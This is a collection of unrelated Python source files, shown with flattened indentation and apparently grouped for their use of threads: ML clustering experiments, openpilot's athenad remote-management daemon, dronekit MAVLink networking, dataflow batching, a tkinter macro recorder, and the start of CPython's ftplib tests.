processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "Expectation Maximization Error", "EM"+add)
# dank magic, wrap an array cuz reasons
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onEM"+add)
print "em done" + add
def km(tx, ty, rx, ry, add="", times=10):
print "km"
#this does the exact same thing as the above
clusters = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 20, 50, 88] # eight for num speakers, eleven for num vowels
orig = add
for num_c in clusters:
add = orig + "nc" + str(num_c)
errs = []
checker = KM(n_clusters=num_c)
checker.fit(ry)
truth = checker.predict(ry)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
clf = KM(n_clusters=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
for index, val in enumerate(result):
clusters[val].append(index)
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "KMeans clustering error", "KM"+add)
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onKM"+add)
print "km done" + add
def nn(tx, ty, rx, ry, add="", iterations=4001):
"""
trains and plots a neural network on the data we have
"""
print "nn" + add
resultst = []
resultsr = []
iter_arr = np.arange(iterations, step=500)
iter_arr[0] = 1
# queue = mp.Queue()
# processes = []
# processes = [mp.Process(target=_nn, args=[tx, ty, rx, ry, i_num]) for i_num in iter_arr]
# for p in processes:
# p.start()
# for p in processes:
# p.join()
# results = []
# for _ in processes:
# results.append(queue.get());
# for result in sorted(results, key=lambda x: x[0]):
# print result
# i_num, train_score, test_score = result
# resultst.append(train_score)
# resultsr.append(test_score)
for i_num in iter_arr:
result = _nn(tx, ty, rx, ry, i_num)
print result
resultst.append(1. - result[1])
resultsr.append(1. - result[2])
plot([0, iterations, 0, 1], (iter_arr, resultst, "ro", iter_arr, resultsr, "bo"), "Network Epoch", "Percent Error", "Neural Network Error", "NN"+add)
print "nn done" + add
def _nn(tx, ty, rx, ry, n_iter):
print "_nn"
nn = Classifier(
layers=[
Layer("Tanh", units=100),
Layer("Softmax")],
n_iter=n_iter)
nn.fit(tx, ty)
resultst = nn.score(tx, ty)
resultsr = nn.score(rx, ry)
print "_nn done"
return n_iter, resultst, resultsr
if __name__=="__main__":
train_x, train_y, test_x, test_y = util.load_vowel()
# em(train_x, train_y, test_x, test_y)
# km(train_x, train_y, test_x, test_y)
# pca(train_x, train_y, test_x, test_y)
# ica(train_x, train_y, test_x, test_y)
# randproj(train_x, train_y, test_x, test_y)
kbest(train_x, train_y, test_x, test_y)
# nn(train_x, train_y, test_x, test_y)
|
athenad.py
|
#!/usr/bin/env python3.7
import json
import os
import hashlib
import io
import random
import select
import socket
import time
import threading
import base64
import requests
import queue
from collections import namedtuple
from functools import partial
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import create_connection, WebSocketTimeoutException, ABNF
from selfdrive.loggerd.config import ROOT
import cereal.messaging as messaging
from common import android
from common.api import Api
from common.params import Params
from cereal.services import service_list
from selfdrive.swaglog import cloudlog
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = os.getenv('HANDLER_THREADS', 4)
LOCAL_PORT_WHITELIST = set([8022])
dispatcher["echo"] = lambda s: s
payload_queue = queue.Queue()
response_queue = queue.Queue()
upload_queue = queue.Queue()
cancelled_uploads = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id'])
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event)),
threading.Thread(target=ws_send, args=(ws, end_event)),
threading.Thread(target=upload_handler, args=(end_event,))
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,))
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for i, thread in enumerate(threads):
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = payload_queue.get(timeout=1)
response = JSONRPCResponseManager.handle(data, dispatcher)
response_queue.put_nowait(response)
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
response_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
while not end_event.is_set():
try:
item = upload_queue.get(timeout=1)
if item.id in cancelled_uploads:
cancelled_uploads.remove(item.id)
continue
_do_upload(item)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=10)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def listDataDirectory():
files = [os.path.relpath(os.path.join(dp, f), ROOT) for dp, dn, fn in os.walk(ROOT) for f in fn]
return files
@dispatcher.add_method
def reboot():
thermal_sock = messaging.sub_sock("thermal", timeout=1000)
ret = messaging.recv_one(thermal_sock)
if ret is None or ret.thermal.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
android.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time()*1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
return [item._asdict() for item in list(upload_queue.queue)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile('/persist/comma/id_rsa.pub'):
return None
with open('/persist/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
sim_state = android.getprop("gsm.sim.state").split(",")
network_type = android.getprop("gsm.network.type").split(',')
mcc_mnc = android.getprop("gsm.sim.operator.numeric") or None
sim_id = android.parse_service_call_string(['iphonesubinfo', '11'])
cell_data_state = android.parse_service_call_unpack(['phone', '46'], ">q")
cell_data_connected = (cell_data_state == 2)
return {
'sim_id': sim_id,
'mcc_mnc': mcc_mnc,
'network_type': network_type,
'sim_state': sim_state,
'data_connected': cell_data_connected
}
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
ssock.close()
local_sock.close()
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
def ws_recv(ws, end_event):
while not end_event.is_set():
try:
data = ws.recv()
payload_queue.put_nowait(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
response = response_queue.get(timeout=1)
ws.send(response.json)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main(gctx=None):
params = Params()
dongle_id = params.get("DongleId").decode('utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
ws.settimeout(1)
conn_retries = 0
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
batch.py
|
# -*- coding:utf8 -*-
# File : batch.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 2/23/17
#
# This file is part of TensorArtist.
from .base import SimpleDataFlowBase
from ...core.logger import get_logger
from ...core.utils.concurrent import MTBooleanEvent
from ...core.utils.meta import iter_kv, assert_none
from copy import copy, deepcopy
from threading import Thread, Event
import traceback
logger = get_logger(__file__)
__all__ = ['BatchDataFlow', 'EpochDataFlow']
def batch_default_filler(buffer, idx, val):
for k, v in iter_kv(val):
if k in buffer:
buffer[k][idx] = v
class BatchDataFlow(SimpleDataFlowBase):
_buffer = None
_cond = None
_filler_thread = None
_stop_event = None
def __init__(self, source, batch_size, sample_dict, filler=batch_default_filler):
super().__init__()
self._source = source
self._batch_size = batch_size
self._sample_dict = sample_dict
self._filler = filler
def _initialize(self):
self._initialize_buffer()
self._initialize_filler()
def _initialize_buffer(self):
self._buffer = [deepcopy(self._sample_dict) for _ in range(2)]
def _initialize_filler(self):
self._cond = [MTBooleanEvent() for _ in range(2)]
self._stop_event = Event()
self._filler_thread = Thread(target=self._filler_mainloop, name=str(self) + ':filler', daemon=True)
self._filler_thread.start()
def _filler_mainloop(self):
current = 0
it = iter(self._source)
try:
while True:
self._cond[current].wait_false()
for i in range(self._batch_size):
self._filler(self._buffer[current], i, next(it))
self._cond[current].set_true()
current = 1 - current
except Exception as e:
logger.warn('{} got exception {} in filler thread: {}.'.format(type(self), type(e), e))
traceback.print_exc()
self._cond[current].set_true()
self._stop_event.set()
def _gen(self):
current = 0
while True:
self._cond[current].wait_true()
if self._stop_event.is_set():
return
yield self._buffer[current]
self._cond[current].set_false()
current = 1 - current
def _len(self):
length = len(self._source)
return None if length is None else length // self._batch_size
class EpochDataFlow(SimpleDataFlowBase):
def __init__(self, source, epoch_size):
self._source = source
self._source_iter = None
self._epoch_size = epoch_size
def _initialize(self):
self._source_iter = iter(self._source)
def _gen(self):
for i in range(self._epoch_size):
try:
yield next(self._source_iter)
except StopIteration:
return
def _len(self):
return self._epoch_size
|
mavlink.py
|
from __future__ import print_function
import time
import socket
import errno
import sys
import os
import platform
import re
import copy
import dronekit
from dronekit import APIException
from dronekit.util import errprinter
from pymavlink import mavutil, mavwp
from queue import Queue, Empty
from threading import Thread
import types
if platform.system() == 'Windows':
from errno import WSAECONNRESET as ECONNABORTED
else:
from errno import ECONNABORTED
class MAVWriter(object):
"""
Indirection layer to take messages written to MAVlink and send them all
on the same thread.
"""
def __init__(self, queue):
self.queue = queue
def write(self, pkt):
self.queue.put(pkt)
def read(self):
errprinter('writer should not have had a read request')
os._exit(43)
class mavudpin_multi(mavutil.mavfile):
'''a UDP mavlink socket'''
def __init__(self, device, baud=None, input=True, broadcast=False, source_system=255, use_native=mavutil.default_native):
a = device.split(':')
if len(a) != 2:
print("UDP ports must be specified as host:port")
sys.exit(1)
self.port = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.udp_server = input
self.broadcast = False
self.addresses = set()
if input:
self.port.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.port.bind((a[0], int(a[1])))
else:
self.destination_addr = (a[0], int(a[1]))
if broadcast:
self.port.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.broadcast = True
mavutil.set_close_on_exec(self.port.fileno())
self.port.setblocking(0)
mavutil.mavfile.__init__(self, self.port.fileno(), device, source_system=source_system, input=input, use_native=use_native)
def close(self):
self.port.close()
def recv(self,n=None):
try:
try:
data, new_addr = self.port.recvfrom(65535)
except socket.error as e:
if e.errno in [ errno.EAGAIN, errno.EWOULDBLOCK, errno.ECONNREFUSED ]:
return ""
if self.udp_server:
self.addresses.add(new_addr)
elif self.broadcast:
self.addresses = set([new_addr])
return data
except Exception as e:
print(e)
def write(self, buf):
try:
try:
if self.udp_server:
for addr in self.addresses:
self.port.sendto(buf, addr)
else:
if len(self.addresses) and self.broadcast:
self.destination_addr = self.addresses[0]
self.broadcast = False
self.port.connect(self.destination_addr)
self.port.sendto(buf, self.destination_addr)
except socket.error:
pass
except Exception as e:
print(e)
def recv_msg(self):
'''message receive routine for UDP link'''
self.pre_message()
s = self.recv()
if len(s) > 0:
if self.first_byte:
self.auto_mavlink_version(s)
m = self.mav.parse_char(s)
if m is not None:
self.post_message(m)
return m
class MAVConnection(object):
def stop_threads(self):
if self.mavlink_thread_in is not None:
self.mavlink_thread_in.join()
self.mavlink_thread_in = None
if self.mavlink_thread_out is not None:
self.mavlink_thread_out.join()
self.mavlink_thread_out = None
def __init__(self, ip, baud=115200, target_system=0, source_system=255, use_native=False):
if ip.startswith("udpin:"):
self.master = mavudpin_multi(ip[6:], input=True, baud=baud, source_system=source_system)
else:
self.master = mavutil.mavlink_connection(ip, baud=baud, source_system=source_system)
# TODO get rid of "master" object as exposed,
# keep it private, expose something smaller for dronekit
self.out_queue = Queue()
self.master.mav = mavutil.mavlink.MAVLink(
MAVWriter(self.out_queue),
srcSystem=self.master.source_system,
use_native=use_native)
# Monkey-patch MAVLink object for fix_targets.
sendfn = self.master.mav.send
def newsendfn(mavmsg, *args, **kwargs):
self.fix_targets(mavmsg)
return sendfn(mavmsg, *args, **kwargs)
self.master.mav.send = newsendfn
# Targets
self.target_system = target_system
# Listeners.
self.loop_listeners = []
self.message_listeners = []
# Debug flag.
self._accept_input = True
self._alive = True
self._death_error = None
import atexit
def onexit():
self._alive = False
self.stop_threads()
atexit.register(onexit)
def mavlink_thread_out():
# Huge try catch in case we see http://bugs.python.org/issue1856
try:
while self._alive:
try:
msg = self.out_queue.get(True, timeout=0.01)
self.master.write(msg)
except Empty:
continue
except socket.error as error:
# If connection reset (closed), stop polling.
if error.errno == ECONNABORTED:
raise APIException('Connection aborting during read')
raise
except Exception as e:
errprinter('>>> mav send error:', e)
break
except APIException as e:
errprinter('>>> ' + str(e.message))
self._alive = False
self.master.close()
self._death_error = e
except Exception as e:
# http://bugs.python.org/issue1856
if not self._alive:
pass
else:
self._alive = False
self.master.close()
self._death_error = e
# Explicitly clear out buffer so .close closes.
self.out_queue = Queue()
def mavlink_thread_in():
# Huge try catch in case we see http://bugs.python.org/issue1856
try:
while self._alive:
# Downtime
time.sleep(0.05)
# Loop listeners.
for fn in self.loop_listeners:
fn(self)
while self._accept_input:
try:
msg = self.master.recv_msg()
except socket.error as error:
# If connection reset (closed), stop polling.
if error.errno == ECONNABORTED:
raise APIException('Connection aborting during send')
raise
except Exception as e:
# TODO this should be more rigorous. How to avoid
# invalid MAVLink prefix '73'
# invalid MAVLink prefix '13'
# errprinter('mav recv error:', e)
msg = None
if not msg:
break
# Message listeners.
for fn in self.message_listeners:
try:
fn(self, msg)
except Exception as e:
errprinter('>>> Exception in message handler for %s' %
msg.get_type())
errprinter('>>> ' + str(e))
except APIException as e:
errprinter('>>> ' + str(e.message))
self._alive = False
self.master.close()
self._death_error = e
return
except Exception as e:
# http://bugs.python.org/issue1856
if not self._alive:
pass
else:
self._alive = False
self.master.close()
self._death_error = e
t = Thread(target=mavlink_thread_in)
t.daemon = True
self.mavlink_thread_in = t
t = Thread(target=mavlink_thread_out)
t.daemon = True
self.mavlink_thread_out = t
def reset(self):
self.out_queue = Queue()
if hasattr(self.master, 'reset'):
self.master.reset()
else:
try:
self.master.close()
except:
pass
self.master = mavutil.mavlink_connection(self.master.address)
def fix_targets(self, message):
"""Set correct target IDs for our vehicle"""
if hasattr(message, 'target_system'):
message.target_system = self.target_system
def forward_loop(self, fn):
"""
Decorator for event loop.
"""
self.loop_listeners.append(fn)
def forward_message(self, fn):
"""
Decorator for message inputs.
"""
self.message_listeners.append(fn)
def start(self):
if not self.mavlink_thread_in.is_alive():
self.mavlink_thread_in.start()
if not self.mavlink_thread_out.is_alive():
self.mavlink_thread_out.start()
def close(self):
# TODO this can block forever if parameters continue to be added
self._alive = False
while not self.out_queue.empty():
time.sleep(0.1)
self.stop_threads()
self.master.close()
def pipe(self, target):
target.target_system = self.target_system
# vehicle -> self -> target
@self.forward_message
def callback(_, msg):
try:
target.out_queue.put(msg.pack(target.master.mav))
except:
try:
assert len(msg.get_msgbuf()) > 0
target.out_queue.put(msg.get_msgbuf())
except:
errprinter('>>> Could not pack this object on receive: %s' % type(msg))
# target -> self -> vehicle
@target.forward_message
def callback(_, msg):
msg = copy.copy(msg)
target.fix_targets(msg)
try:
self.out_queue.put(msg.pack(self.master.mav))
except:
try:
assert len(msg.get_msgbuf()) > 0
self.out_queue.put(msg.get_msgbuf())
except:
errprinter('>>> Could not pack this object on forward: %s' % type(msg))
return target
|
conftest.py
|
try:
from http.server import HTTPServer, SimpleHTTPRequestHandler
except ImportError:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import ssl
import threading
import pytest
from requests.compat import urljoin
def prepare_url(value):
# Issue #1483: Make sure the URL always has a trailing slash
httpbin_url = value.url.rstrip("/") + "/"
def inner(*suffix):
return urljoin(httpbin_url, "/".join(suffix))
return inner
@pytest.fixture
def httpbin(httpbin):
return prepare_url(httpbin)
@pytest.fixture
def httpbin_secure(httpbin_secure):
return prepare_url(httpbin_secure)
@pytest.fixture
def nosan_server(tmp_path_factory):
# delay importing until the fixture in order to make it possible
# to deselect the test via command-line when trustme is not available
import trustme
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only commonName, no subjectAltName
server_cert = ca.issue_cert(common_name="localhost")
ca_bundle = str(tmpdir / "ca.pem")
ca.cert_pem.write_to_path(ca_bundle)
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
server_cert.configure_cert(context)
server = HTTPServer(("localhost", 0), SimpleHTTPRequestHandler)
server.socket = context.wrap_socket(server.socket, server_side=True)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
yield "localhost", server.server_address[1], ca_bundle
server.shutdown()
server_thread.join()
|
__init__.py
|
import tkinter as tk
from tkinter import filedialog, messagebox
from os import path
from utils import MyMouseKeyboard
import time
import threading
from functools import partial
import pyautogui as pygui
import subprocess
# subprocess.Popen is non-blocking
# subprocess.call is blocking
class Application(tk.Frame):
stoprec_exe = False
class MyButton(tk.Button):
def __init__(self, *args, **kwargs):
# tk.Button.__init__(self, *args, **kwargs)
tk.Button.__init__(self, *args, **kwargs)
class Widgets(tk.Menu):
def __init__(self, *args, **kwargs):
# tk.Button.__init__(self, *args, **kwargs)
tk.Menu.__init__(self, *args, **kwargs)
def __init__(self, master=None):
super().__init__(master)
self.master = master
menubar = self.Widgets()
menubar.add_command(label='Load File', command=lambda: self.start(self.dialog_open_arq))
menubar.add_command(label='Save As File', command=lambda: self.start(self.dialog_save_arq))
menubar.add_command(label='quit', command=master.quit)
master.config(menu=menubar)
"""
bt = self.MyButton(fg='black', bg='red')
bt["text"] = 'GRAVAR'
bt["command"] = lambda: self.start(self.gravando)
bt.pack(side="top", anchor='w', fill=tk.X)
"""
bt = self.MyButton(fg='black', bg='yellow')
bt["text"] = 'Gera Novo Arquivo'
bt["command"] = lambda: self.start(self.nova_gravacao)
bt.pack(side="top", anchor='w', fill=tk.X)
btrp = self.MyButton(fg='black', bg='green')
btrp["text"] = 'REPRODUZIR'
btrp["command"] = lambda: self.start(self.executa)
btrp.pack(side="top", anchor='w', fill=tk.X)
# threads
def refresh(self):
self.master.update()
self.master.after(1000, self.refresh)
def start(self, target):
self.refresh()
threading.Thread(target=target).start()
# #######
def mk_kboard_instance(self, select=False):
"""
:param select: if True, select the file
:return: instance of MyMouseKeybaord
"""
try:
narq = self.arq0atual
except AttributeError:
if select:
narq = self.dialog_open_arq()
else:
narq = self.mk_fld()
dale = MyMouseKeyboard(narq)
return dale
def mk_fld(self, fld=None):
self.start(self.forget_arq0)
if fld == '' or fld is None:
fld = str(time.time()).replace('.', '')
fld += f'.txt' if path.splitext(fld)[1] == '' else ''
fld_path = path.abspath(fld)
print(path.dirname(path.abspath(fld)), 'print tche de teste', fld)
self.arq0atual_label = tk.Button(text=f"Start Recording",
command=lambda: self.show_arq0(fld_path), bg='#fda321', fg='white')
self.arq0atual_label.pack()
self.arq0atual = fld
return self.arq0atual
def show_arq0(self, to_file):
fld = to_file
texto = self.arq0atual_label["text"]
try:
open(to_file).close()
subprocess.Popen(f'explorer /select,"{to_file}" ')
except FileNotFoundError:
pass
if texto == 'Start Recording':
self.arq0atual_label['bg'] = 'red'
self.arq0atual_label["text"] = 'Stop Recording'
self.start(self.gravando)
# ##################################
# VOU ENVIAR AS CORDENADAS DO BOTÃO E QDO ELE FOR CLICADO, VAI ACABAR A THREAD
# ################################
elif texto == 'Stop Recording':
fld_resume = fld.replace(fld[3:len(fld) - int(len(fld) / 2)], '...')
self.arq0atual_label["text"] = fld_resume
self.arq0atual_label['bg'] = 'black'
self.stoprec()
def forget_arq0(self):
try:
self.arq0atual_label.pack_forget()
except (AttributeError, NameError):
pass
# QUANDO CLICAR NO BOTÃO
# -------------------------------botões
def dialog_open_arq(self):
fld0 = filedialog.askopenfilename(defaultextension='txt', filetypes=(('text files', 'txt'), ), initialdir=path.dirname(__file__))
if fld0 == '':
return None
fld = self.mk_fld(fld0)
return fld
def dialog_save_arq(self):
fld0 = filedialog.asksaveasfilename(title="Salve a gravação", filetypes=(('text files', 'txt'), ))
fld = self.mk_fld(fld0)
return fld
def gravando(self, parou=False):
dale = self.mk_kboard_instance()
self.stoprec_exe = dale
dale.listen()
dale.backup()
def stoprec(self):
print(f'\033[1;31m STOP REC\033[m, {self.stoprec_exe}')
if self.stoprec_exe:
dale = self.stoprec_exe
self.stoprec_exe.stopit()
def executa(self):
dale = self.mk_kboard_instance(select=True)
try:
dale.playitbackup()
except FileNotFoundError:
messagebox.showinfo('ERRO', 'Gere um novo arquivo primeiro!!!')
else:
messagebox.showinfo('FIM!!!', f'Arquivo {self.arq0atual} EXECUTADO COM SUCESSO. [enter] para continuar')
def nova_gravacao(self):
self.forget_arq0()
self.mk_fld(None)
def execute():
root = tk.Tk()
root.resizable(True, True)
rx, ry = pygui.getActiveWindow().center
root.geometry(f'250x100+{rx}+{ry}')
root.wm_iconposition(rx, ry)
app = Application(root)
app.mainloop()
|
run_3.py
|
#!/usr/bin/env python
from multiprocessing import Process, Queue
import time
def bad_ass_function(**kwargs):
n = int(kwargs["n"])
q = kwargs["queue"]
t = time.time
u = t() + n
while t() < u:
pass
return_str = "finished {}s of badass-ery".format(n)
q.put(return_str)
def dump_queue(q):
print("emptying queue:")
while not q.empty():
print(q.get())
print("queue is empty")
if __name__ == "__main__":
n = 3
queue = Queue()
# Process takes keyword args: target=function_name, args=function_args_tuple, kwargs=function_kwargs_dict
p1 = Process(target=bad_ass_function,kwargs={"n":n,"queue":queue})
# calls "p.run" in a new thread
#p1.start()
# block this thread until p1 terminates
#p1.join()
# create two new Process objects
#n = 5
#p2 = Process(target=bad_ass_function,kwargs={"n":n,"queue":queue})
#time.sleep(1)
#p3 = Process(target=bad_ass_function,kwargs={"n":n,"queue":queue})
#p2.start()
#p3.start()
#dump_queue(queue)
#p3.join()
#dump_queue(queue)
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import threading
import time
import unittest
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import socket_helper
from test.support.socket_helper import HOST, HOSTv6
TIMEOUT = support.LOOPBACK_TIMEOUT
DEFAULT_ENCODING = 'utf-8'
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000 + 'non-ascii char \xAE\r\n'
LIST_DATA = 'foo\r\nbar\r\n non-ascii char \xAE\r\n'
NLST_DATA = 'foo\r\nbar\r\n non-ascii char \xAE\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n"
"type=dir;perm=cpmel;unique==SGP1; dir \xAE non-ascii char\r\n"
"type=file;perm=r;unique==SGP2; file \xAE non-ascii char\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
self.encoding = baseclass.encoding
def handle_read(self):
new_data = self.recv(1024).decode(self.encoding, 'replace')
self.baseclass.last_received_data += new_data
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode(self.encoding))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn, encoding=DEFAULT_ENCODING):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
self.encoding = encoding
# We use this as the string IPv4 address to direct the client
# to in response to a PASV command. To test security behavior.
# https://bugs.python.org/issue43285/.
self.fake_pasv_server_ip = '252.253.254.255'
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode(self.encoding)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode(self.encoding) + b'\r\n')
def cmd_port(self, arg):
